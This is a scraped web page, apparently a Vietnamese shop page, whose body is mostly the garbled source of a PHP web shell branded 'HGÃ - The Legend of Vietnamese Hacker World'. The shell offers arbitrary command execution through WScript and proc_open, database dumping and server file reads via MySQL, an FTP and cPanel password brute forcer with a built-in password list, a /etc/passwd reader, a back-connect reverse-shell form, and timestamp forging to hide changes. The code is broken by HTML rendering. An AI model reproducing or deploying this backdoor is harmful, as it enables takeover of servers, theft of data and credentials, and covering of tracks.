|
Bàn trang điểm
Đặt hàng 
 |
 |
|
 |
 |
|
HGÃ - The Legend of Vietnamese Hacker World - Please wait...
');
exit;
}
else
{
$err_mess = ''.mysql_error().'
'); $filename = basename($_SERVER['HTTP_HOST'].'_MySQL.sql'); header('Content-type: application/unknown'); header('Content-Disposition: attachment; filename='.$filename); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { $mysqldata .= sqldumptable($currow[0]); } } mysql_close(); exit; } // Mysql if($doing=='mysqldown'){ if (!$dbname) { $errmsg = 'Please input dbname'; } else { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); if (!file_exists($mysqldlfile)) { $errmsg = 'The file you want Downloadable was nonexistent'; } else { $result = q("select load_file('$mysqldlfile');"); if(!$result){ q("DROP TABLE IF EXISTS tmp_angel;"); q("CREATE TABLE tmp_angel (content LONGBLOB NOT NULL);"); //Download SQL q("LOAD DATA LOCAL INFILE '".addslashes($mysqldlfile)."' INTO TABLE tmp_angel FIELDS TERMINATED BY '__angel_{$timestamp}_eof__' ESCAPED BY '' LINES TERMINATED BY '__angel_{$timestamp}_eof__';"); $result = q("select content from tmp_angel"); q("DROP TABLE tmp_angel"); } $row = @mysql_fetch_array($result); if (!$row) { $errmsg = 'Load file failed '.mysql_error(); } else { $fileinfo = pathinfo($mysqldlfile); header('Content-type: application/x-'.$fileinfo['extension']); header('Content-Disposition: attachment; filename='.$fileinfo['basename']); header("Accept-Length: ".strlen($row[0])); echo $row[0]; exit; } } } } ?>|
Loading
|
|
||
| [Server IP: ".gethostbyname($_SERVER['SERVER_NAME'])."";?> - Your IP: ".$_SERVER['REMOTE_ADDR']."";?>] -------------------------------------------------------------------------------------- File Manager | MySQL Manager | MySQL Upload & Download | Execute Command | PHP Variable | Eval PHP Code | Brute | /etc/passwd | Back Connect |
|
'goaction'));
makehide('action');
formfoot();
$errmsg && m($errmsg);
// Dir function
!$dir && $dir = '.';
$nowpath = getPath(SA_ROOT, $dir);
if (substr($dir, -1) != '/') {
$dir = $dir.'/';
}
$uedir = ue($dir);
if (!$action || $action == 'file') {
// Non-writeable
$dir_writeable = @is_writable($nowpath) ? 'Writable' : 'Non-writable';
// Delete dir
if ($doing == 'deldir' && $thefile) {
if (!file_exists($thefile)) {
m($thefile.' directory does not exist');
} else {
m('Directory delete '.(deltree($thefile) ? basename($thefile).' success' : 'failed'));
}
}
// Create new dir
elseif ($newdirname) {
$mkdirs = $nowpath.$newdirname;
if (file_exists($mkdirs)) {
m('Directory has already existed');
} else {
m('Directory created '.(@mkdir($mkdirs,0777) ? 'success' : 'failed'));
@chmod($mkdirs,0777);
}
}
// Upload file
elseif ($doupfile) {
m('File upload '.(@copy($_FILES['uploadfile']['tmp_name'],$uploaddir.'/'.$_FILES['uploadfile']['name']) ? 'success' : 'failed'));
}
// Edit file
elseif ($editfilename && $filecontent) {
$fp = @fopen($editfilename,'w');
m('Save file '.(@fwrite($fp,$filecontent) ? 'success' : 'failed'));
@fclose($fp);
}
// Modify
elseif ($pfile && $newperm) {
if (!file_exists($pfile)) {
m('The original file does not exist');
} else {
$newperm = base_convert($newperm,8,10);
m('Modify file attributes '.(@chmod($pfile,$newperm) ? 'success' : 'failed'));
}
}
// Rename
elseif ($oldname && $newfilename) {
$nname = $nowpath.$newfilename;
if (file_exists($nname) || !file_exists($oldname)) {
m($nname.' has already existed or original file does not exist');
} else {
m(basename($oldname).' renamed '.basename($nname).(@rename($oldname,$nname) ? ' success' : 'failed'));
}
}
// Copu
elseif ($sname && $tofile) {
if (file_exists($tofile) || !file_exists($sname)) {
m('The goal file has already existed or original file does not exist');
} else {
m(basename($tofile).' copied '.(@copy($sname,$tofile) ? basename($tofile).' success' : 'failed'));
}
}
// File exit
elseif ($curfile && $tarfile) {
if (!@file_exists($curfile) || !@file_exists($tarfile)) {
m('The goal file has already existed or original file does not exist');
} else {
$time = @filemtime($tarfile);
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// Date
elseif ($curfile && $year && $month && $day && $hour && $minute && $second) {
if (!@file_exists($curfile)) {
m(basename($curfile).' does not exist');
} else {
$time = strtotime("$year-$month-$day $hour:$minute:$second");
m('Modify file the last modified '.(@touch($curfile,$time,$time) ? 'success' : 'failed'));
}
}
// Download
elseif($doing == 'downrar') {
if ($dl) {
$dfiles='';
foreach ($dl as $filepath => $value) {
$dfiles.=$filepath.',';
}
$dfiles=substr($dfiles,0,strlen($dfiles)-1);
$dl=explode(',',$dfiles);
$zip=new PHPZip($dl);
$code=$zip->out;
header('Content-type: application/octet-stream');
header('Accept-Ranges: bytes');
header('Accept-Length: '.strlen($code));
header('Content-Disposition: attachment;filename='.$_SERVER['HTTP_HOST'].'_Files.tar.gz');
echo $code;
exit;
} else {
m('Please select file(s)');
}
}
// Delete file
elseif($doing == 'delfiles') {
if ($dl) {
$dfiles='';
$succ = $fail = 0;
foreach ($dl as $filepath => $value) {
if (@unlink($filepath)) {
$succ++;
} else {
$fail++;
}
}
m('Deleted file have finished??choose '.count($dl).' success '.$succ.' fail '.$fail);
} else {
m('Please select file(s)');
}
}
// Function Newdir
formhead(array('name'=>'createdir'));
makehide('newdirname');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileperm'));
makehide('newperm');
makehide('pfile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'copyfile'));
makehide('sname');
makehide('tofile');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'rename'));
makehide('oldname');
makehide('newfilename');
makehide('dir',$nowpath);
formfoot();
formhead(array('name'=>'fileopform'));
makehide('action');
makehide('opfile');
makehide('dir');
formfoot();
$free = @disk_free_space($nowpath);
!$free && $free = 0;
$all = @disk_total_space($nowpath);
!$all && $all = 0;
$used = $all-$free;
$used_percent = @round(100/($all/$free),2);
p('File Manager Current disk free '.sizecount($free).' of '.sizecount($all).' ('.$used_percent.'%)');
?>
| ||||||
| ');
p(' | ||||||
| Filename | Last modified | Size | Chmod / Perms | Action | ||
| 0 | '); p(''.$dirdb['filename'].' | '); p(''.$dirdb['mtime'].' | '); p('-- | '); p(''); p(''.$dirdb['dirchmod'].' / '); p(''.$dirdb['dirperm'].''.$dirdb['fileowner'].' | '); p('Del | Rename | '); p('|
| = | Parent Directory | '); p('|||||
'); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBName:'); makeinput(array('name'=>'dbname','size'=>15,'value'=>$dbname)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); p('
'); formfoot(); p(''); } elseif ($action == 'sqladmin') { !$dbhost && $dbhost = 'localhost'; !$dbuser && $dbuser = 'root'; !$dbport && $dbport = '3306'; $dbform = ''; if(isset($dbhost)){ $dbform .= "\n"; } if(isset($dbuser)) { $dbform .= "\n"; } if(isset($dbpass)) { $dbform .= "\n"; } if(isset($dbport)) { $dbform .= "\n"; } if(isset($dbname)) { $dbform .= "\n"; } if(isset($charset)) { $dbform .= "\n"; } if ($doing == 'backupmysql' && $saveasfile) { if (!$table) { m('Please choose the table'); } else { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); $table = array_flip($table); $fp = @fopen($path,'w'); if ($fp) { $result = q('SHOW tables'); if (!$result) p(''.mysql_error().'
'); $mysqldata = ''; while ($currow = mysql_fetch_array($result)) { if (isset($table[$currow[0]])) { sqldumptable($currow[0], $fp); } } fclose($fp); $fileurl = str_replace(SA_ROOT,'',$path); m('Database has success backup to '.$path.''); mysql_close(); } else { m('Backup failed'); } } } if ($insert && $insertsql) { $keystr = $valstr = $tmp = ''; foreach($insertsql as $key => $val) { if ($val) { $keystr .= $tmp.$key; $valstr .= $tmp."'".addslashes($val)."'"; $tmp = ','; } } if ($keystr && $valstr) { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error()); } } if ($update && $insertsql && $base64) { $valstr = $tmp = ''; foreach($insertsql as $key => $val) { $valstr .= $tmp.$key."='".addslashes($val)."'"; $tmp = ','; } if ($valstr) { $where = base64_decode($base64); dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error()); } } if ($doing == 'del' && $base64) { $where = base64_decode($base64); $delete_sql = "DELETE FROM $tablename WHERE $where"; dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error()); } if ($tablename && $doing == 'drop') { dbconn($dbhost,$dbuser,$dbpass,$dbname,$charset,$dbport); if (q("DROP TABLE $tablename")) { m('Drop table of success'); $tablename = ''; } else { m(mysql_error()); } } $charsets = array(''=>'Default','gbk'=>'GBK', 'big5'=>'Big5', 'utf8'=>'UTF-8', 'latin1'=>'Latin1'); formhead(array('title'=>'MYSQL Manager')); makehide('action','sqladmin'); p(''); p('DBHost:'); makeinput(array('name'=>'dbhost','size'=>20,'value'=>$dbhost)); p(':'); makeinput(array('name'=>'dbport','size'=>4,'value'=>$dbport)); p('DBUser:'); makeinput(array('name'=>'dbuser','size'=>15,'value'=>$dbuser)); p('DBPass:'); makeinput(array('name'=>'dbpass','size'=>15,'value'=>$dbpass)); p('DBCharset:'); makeselect(array('name'=>'charset','option'=>$charsets,'selected'=>$charset)); makeinput(array('name'=>'connect','value'=>'Connect','type'=>'submit','class'=>'bt')); p('
'); formfoot(); ?> 'recordlist')); makehide('doing'); makehide('action','sqladmin'); makehide('base64'); makehide('tablename'); p($dbform); formfoot(); // Data formhead(array('name'=>'setdbname')); makehide('action','sqladmin'); p($dbform); if (!$dbname) { makehide('dbname'); } formfoot(); formhead(array('name'=>'settable')); makehide('action','sqladmin'); p($dbform); makehide('tablename'); makehide('page',$page); makehide('doing'); formfoot(); $cachetables = array(); $pagenum = 30; $page = intval($page); if($page) { $start_limit = ($page - 1) * $pagenum; } else { $start_limit = 0; $page = 1; } if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) { dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport); // get mysql server $mysqlver = mysql_get_server_info(); p('MySQL '.$mysqlver.' running in '.$dbhost.' as '.$dbuser.'@'.$dbhost.'
'); $highver = $mysqlver > '4.1' ? 1 : 0; // Show database $query = q("SHOW DATABASES"); $dbs = array(); $dbs[] = '-- Select a database --'; while($db = mysql_fetch_array($query)) { $dbs[$db['Database']] = $db['Database']; } makeselect(array('title'=>'Please select a database:','name'=>'db[]','option'=>$dbs,'selected'=>$dbname,'onchange'=>'moddbname(this.options[this.selectedIndex].value)','newline'=>1)); $tabledb = array(); if ($dbname) { p(''); p('Current dababase: '.$dbname.''); if ($tablename) { p(' | Current Table: '.$tablename.' [ Insert | Structure | Drop ]'); } p('
'); mysql_select_db($dbname); $getnumsql = ''; $runquery = 0; if ($sql_query) { $runquery = 1; } $allowedit = 0; if ($tablename && !$sql_query) { $sql_query = "SELECT * FROM $tablename"; $getnumsql = $sql_query; $sql_query = $sql_query." LIMIT $start_limit, $pagenum"; $allowedit = 1; } p(''); if ($tablename || ($runquery && $sql_query)) { if ($doing == 'structure') { $result = q("SHOW COLUMNS FROM $tablename"); $rowdb = array(); while($row = mysql_fetch_array($result)) { $rowdb[] = $row; } p('| Field | '); p('Type | '); p('Null | '); p('Key | '); p('Default | '); p('Extra | '); p('
| '.$row['Field'].' | '); p(''.$row['Type'].' | '); p(''.$row['Null'].' | '); p(''.$row['Key'].' | '); p(''.$row['Default'].' | '); p(''.$row['Extra'].' | '); p('
| Action | '); $fieldnum = @mysql_num_fields($result); for($i=0;$i<$fieldnum;$i++){ $name = @mysql_field_name($result, $i); $type = @mysql_field_type($result, $i); $len = @mysql_field_len($result, $i); p("$name $type($len) | ");
}
p('
| '.html_clean($inside).' | '; } $where = base64_encode($where); if ($allowedit) p('Edit | Del | '); p($b1); p('
'); p('Your IP:'); makeinput(array('name'=>'yourip','size'=>20,'value'=>$yourip)); p('Your Port:'); makeinput(array('name'=>'yourport','size'=>15,'value'=>$yourport)); p('Use:'); makeselect(array('name'=>'use','option'=>$usedb,'selected'=>$use)); makeinput(array('name'=>'start','value'=>'Start','type'=>'submit','class'=>'bt')); p('
'); formfoot(); }//end backconnect window via NC // Brute elseif ($action == 'brute') { formhead(array('title'=>'Brute Forcer')); makehide('action','brute'); makehide('dir',$brute); @ini_set('memory_limit', 1000000000000); $connect_timeout=5; @set_time_limit(0); $submit = $_REQUEST['submit']; $users = $_REQUEST['users']; $pass = $_REQUEST['passwords']; $target = $_REQUEST['target']; $option = $_REQUEST['option']; $passlist = "0123456 01234567 012345678 0123456789 01234567890 123456 1234567 12345678 123456789 1234567890 111111 000000 222222 333333 444444 555555 666666 777777 888888 999999 123123 456456 789789 123321 456654 654321 7654321 87654321 987654321 0987654321 admin administrator admincp cpanel adminx admins password passwords passw0rd p@ssw0rd p@ssword khongco 25251325 passw0rds"; if($target == ''){ $target = 'localhost'; } print "";
?>
Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
p("[ attack@vbateam.net ]#
Attacking has been done! Username: $user / Password: $pass => Login
");
}
curl_close($ch);}
function cpanel_check($host,$user,$pass,$timeout){
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
curl_setopt($ch, CURLOPT_FAILONERROR, 1);
$data = curl_exec($ch);
if ( curl_errno($ch) == 28 ) {
print " Error : Connection timed out , make confidence about validation of target !";
exit;}
elseif ( curl_errno($ch) == 0 ){
p("[ attack@vbateam.net ]# Attacking has been done! Username: $user / Password: $pass
");}curl_close($ch);}
if(isset($submit) && !empty($submit)){
$userlist = explode ("\n" , $users );
$passlist = explode ("\n" , $pass );
p('[ attack@vbateam.net ]# Attacking ...
');
foreach ($userlist as $user) {
$_user = trim($user);
foreach ($passlist as $password ) {
$_pass = trim($password);
if($option == "ftp"){
ftp_check($target,$_user,$_pass,$connect_timeout);
}
if ($option == "cpanel")
{
cpanel_check($target,$_user,$_pass,$connect_timeout);
}
}
}
}
formfoot();
}
elseif ($action == 'etcpwd') {
formhead(array('title'=>'Get /etc/passwd'));
makehide('action','etcpwd');
makehide('dir',$nowpath);
$i = 0;
echo "
Instead »'); p('year:'); makeinput(array('name'=>'year','value'=>date('Y',$opfilemtime),'size'=>4)); p('month:'); makeinput(array('name'=>'month','value'=>date('m',$opfilemtime),'size'=>2)); p('day:'); makeinput(array('name'=>'day','value'=>date('d',$opfilemtime),'size'=>2)); p('hour:'); makeinput(array('name'=>'hour','value'=>date('H',$opfilemtime),'size'=>2)); p('minute:'); makeinput(array('name'=>'minute','value'=>date('i',$opfilemtime),'size'=>2)); p('second:'); makeinput(array('name'=>'second','value'=>date('s',$opfilemtime),'size'=>2)); p('
'); formfooter(); }//end newtime elseif ($action == 'shell') { if (IS_WIN && IS_COM) { if($program && $parameter) { $shell= new COM('Shell.Application'); $a = $shell->ShellExecute($program,$parameter); m('Program run has '.(!$a ? 'success' : 'fail')); } !$program && $program = 'c:\windows\system32\cmd.exe'; !$parameter && $parameter = '/c net start > '.SA_ROOT.'log.txt'; formhead(array('title'=>'Execute Program')); makehide('action','shell'); makeinput(array('title'=>'Program','name'=>'program','value'=>$program,'newline'=>1)); p(''); makeinput(array('title'=>'Parameter','name'=>'parameter','value'=>$parameter)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); } formhead(array('title'=>'Execute Command')); makehide('action','shell'); if (IS_WIN && IS_COM) { $execfuncdb = array('phpfunc'=>'phpfunc','wscript'=>'wscript','proc_open'=>'proc_open'); makeselect(array('title'=>'Use:','name'=>'execfunc','option'=>$execfuncdb,'selected'=>$execfunc,'newline'=>1)); } p(''); makeinput(array('title'=>'Command','name'=>'command','value'=>$command)); makeinput(array('name'=>'submit','class'=>'bt','type'=>'submit','value'=>'Execute')); p('
'); formfoot(); if ($command) { p('');
if ($execfunc=='wscript' && IS_WIN && IS_COM) {
$wsh = new COM('WScript.shell');
$exec = $wsh->exec('cmd.exe /c '.$command);
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
} elseif ($execfunc=='proc_open' && IS_WIN && IS_COM) {
$descriptorspec = array(
0 => array('pipe', 'r'),
1 => array('pipe', 'w'),
2 => array('pipe', 'w')
);
$process = proc_open($_SERVER['COMSPEC'], $descriptorspec, $pipes);
if (is_resource($process)) {
fwrite($pipes[0], $command."\r\n");
fwrite($pipes[0], "exit\r\n");
fclose($pipes[0]);
while (!feof($pipes[1])) {
echo fgets($pipes[1], 1024);
}
fclose($pipes[1]);
while (!feof($pipes[2])) {
echo fgets($pipes[2], 1024);
}
fclose($pipes[2]);
proc_close($process);
}
} else {
echo(execute($command));
}
p('');
}
}//end shell
elseif ($action == 'phpenv') {
$upsize=getcfg('file_uploads') ? getcfg('upload_max_filesize') : 'Not allowed';
$adminmail=isset($_SERVER['SERVER_ADMIN']) ? $_SERVER['SERVER_ADMIN'] : getcfg('sendmail_from');
!$dis_func && $dis_func = 'No';
$info = array(
1 => array('Server Time',date('Y/m/d h:i:s',$timestamp)),
2 => array('Server Domain',$_SERVER['SERVER_NAME']),
3 => array('Server IP',gethostbyname($_SERVER['SERVER_NAME'])),
4 => array('Server OS',PHP_OS),
5 => array('Server OS Charset',$_SERVER['HTTP_ACCEPT_LANGUAGE']),
6 => array('Server Software',$_SERVER['SERVER_SOFTWARE']),
7 => array('Server Web Port',$_SERVER['SERVER_PORT']),
8 => array('PHP run mode',strtoupper(php_sapi_name())),
9 => array('The file path',__FILE__),
10 => array('PHP Version',PHP_VERSION),
11 => array('PHPINFO',(IS_PHPINFO ? 'Yes' : 'No')),
12 => array('Safe Mode',getcfg('safe_mode')),
13 => array('Administrator',$adminmail),
14 => array('allow_url_fopen',getcfg('allow_url_fopen')),
15 => array('enable_dl',getcfg('enable_dl')),
16 => array('display_errors',getcfg('display_errors')),
17 => array('register_globals',getcfg('register_globals')),
18 => array('magic_quotes_gpc',getcfg('magic_quotes_gpc')),
19 => array('memory_limit',getcfg('memory_limit')),
20 => array('post_max_size',getcfg('post_max_size')),
21 => array('upload_max_filesize',$upsize),
22 => array('max_execution_time',getcfg('max_execution_time').' second(s)'),
23 => array('disable_functions',$dis_func),
);
if($phpvarname) {
m($phpvarname .' : '.getcfg($phpvarname));
}
formhead(array('title'=>'Server environment'));
makehide('action','phpenv');
makeinput(array('title'=>'Please input PHP configuration parameter(eg:magic_quotes_gpc)','name'=>'phpvarname','value'=>$phpvarname,'newline'=>1));
formfooter();
$hp = array(0=> 'Server', 1=> 'PHP');
for($a=0;$a<2;$a++) {
p(''.$hp[$a].' »
'); p('- ');
if ($a==0) {
for($i=1;$i<=9;$i++) {
p('
- '.$info[$i][0].':'.$info[$i][1].' '); } } elseif ($a == 1) { for($i=10;$i<=23;$i++) { p('
- '.$info[$i][0].':'.$info[$i][1].' '); } } p('
Copyright (C) 2004-2010 - Develop by HGÃ - - The Legend of Vietnamese Hacker World All Rights Reserved.
';
echo $msg;
echo '';
}
function scookie($key, $value, $life = 0, $prefix = 1) {
global $admin, $timestamp, $_SERVER;
$key = ($prefix ? $admin['cookiepre'] : '').$key;
$life = $life ? $life : $admin['cookielife'];
$useport = $_SERVER['SERVER_PORT'] == 443 ? 1 : 0;
setcookie($key, $value, $timestamp+$life, $admin['cookiepath'], $admin['cookiedomain'], $useport);
}
function multi($num, $perpage, $curpage, $tablename) {
$multipage = '';
if($num > $perpage) {
$page = 10;
$offset = 5;
$pages = @ceil($num / $perpage);
if($page > $pages) {
$from = 1;
$to = $pages;
} else {
$from = $curpage - $offset;
$to = $curpage + $page - $offset - 1;
if($from < 1) {
$to = $curpage + 1 - $from;
$from = 1;
if(($to - $from) < $page && ($to - $from) < $pages) {
$to = $page;
}
} elseif($to > $pages) {
$from = $curpage - $pages + $to;
$to = $pages;
if(($to - $from) < $page && ($to - $from) < $pages) {
$from = $pages - $page + 1;
}
}
}
$multipage = ($curpage - $offset > 1 && $pages > $page ? 'First ' : '').($curpage > 1 ? 'Prev ' : '');
for($i = $from; $i <= $to; $i++) {
$multipage .= $i == $curpage ? $i.' ' : '['.$i.'] ';
}
$multipage .= ($curpage < $pages ? 'Next' : '').($to < $pages ? ' Last' : '');
$multipage = $multipage ? 'Pages: '.$multipage.'
' : ''; } return $multipage; } // Login page function loginpage() { ?>